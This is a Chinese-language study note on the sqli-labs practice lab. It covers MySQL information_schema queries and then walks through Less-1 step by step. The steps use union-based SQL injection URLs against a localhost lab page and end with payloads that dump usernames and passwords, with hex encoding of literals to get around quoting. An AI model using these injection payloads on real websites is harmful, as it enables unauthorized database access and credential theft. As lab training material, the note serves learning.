sqli-labs的重要知识 - 《MySQL》

mysql 基本简单用法：

mysql 基本简单用法：

查库(万能句子)
select schema_name from information_schema.schemata;
查表
select table_name from information_schema.tables where table_schema='security';
查字段（列）
select column_name from information_schema.columns where table_name='users';
查字段
select username,password from security.users;

SELECT * FROM users WHERE id='1' LIMIT 0,1
其中limit 0,1 其中第一位是从第几个开始，比如0代表第一个开始，而第二位的1代表的是显示多少数据
SELECT * FROM users WHERE id='1'or 1=1-- ' LIMIT 0,1
—+ —空格 #注释符使用之后，后面的句子不再进行
or与and的区别
a and b true 全部正确才返回正确
a or b true 只有一个正确就返回正确
重要函数：
select system_user();//显示系统用户
1641379346(1).png
select user();//显示登陆用户
1641379507(1).png
select current_user();//显示登陆用户
1641380155(1).png
select database();//使用的数据库；
1641379626(1).png
select version();//MySQL的版本信息
1641379754(1).png
select @@datadir;//MySQL的安装路径
1641379872(1).png
select @@version_compile_os;//操作系统的位数
1641380039(1).png
SELECT * FROM users WHERE id='1' order by 10-- ' LIMIT 0,1;
SELECT * FROM users order by 2;
用order by 二分法猜测有几列；
order by 几（数字）
就对第几列进行排序
回显：
SELECT * FROM users WHERE id='-1' union select 1,2,3-- ' LIMIT 0,1
group_concat（）
将所有的数据连接拼接后显示
concat_ws(‘~’,A,B)
less-01 ‘1’
第一步：加单引号
[http://127.0.0.1/sqli-labs-master/Less-1/?id=1'](http://127.0.0.1/sqli-labs-master/Less-1/?id=1')
得到报错说明存在注入漏洞
第二步：用order by

说明数据表存在3列
第三步：回显联合查询
[http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union](http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union) select 1,2,3--+
第四步：查库

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_
concat(schema_name) from information_schema.schemata--+

所有数据库：
Your Password:information_schema,challenges,member,message_board,mysql,performance_schema,runoob,security,su,sys,yyds
第五步：查表

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_
concat(table_name) from information_schema.tables where table_schema='security'--+

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_
concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+//推荐不加单引号会发生单引号问题
//建议用16进制

第六步：查列

http://127.0.0.1/sqli-labs-master/Less-1/?id=-1'union select 1,2,group_
concat(column_name) from information_schema.columns where table_name=0x7573657273--+

第七步：取数据

http://127.0.0.1/sqli-labs-master/Less-1/
?id=-1'union select 1,2,group_concat(concat_ws('~',username,password)) from security.users--+//~的单引号用十六进制

推荐用法

http://127.0.0.1/sqli-labs-master/Less-1/
?id=-1'union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users--+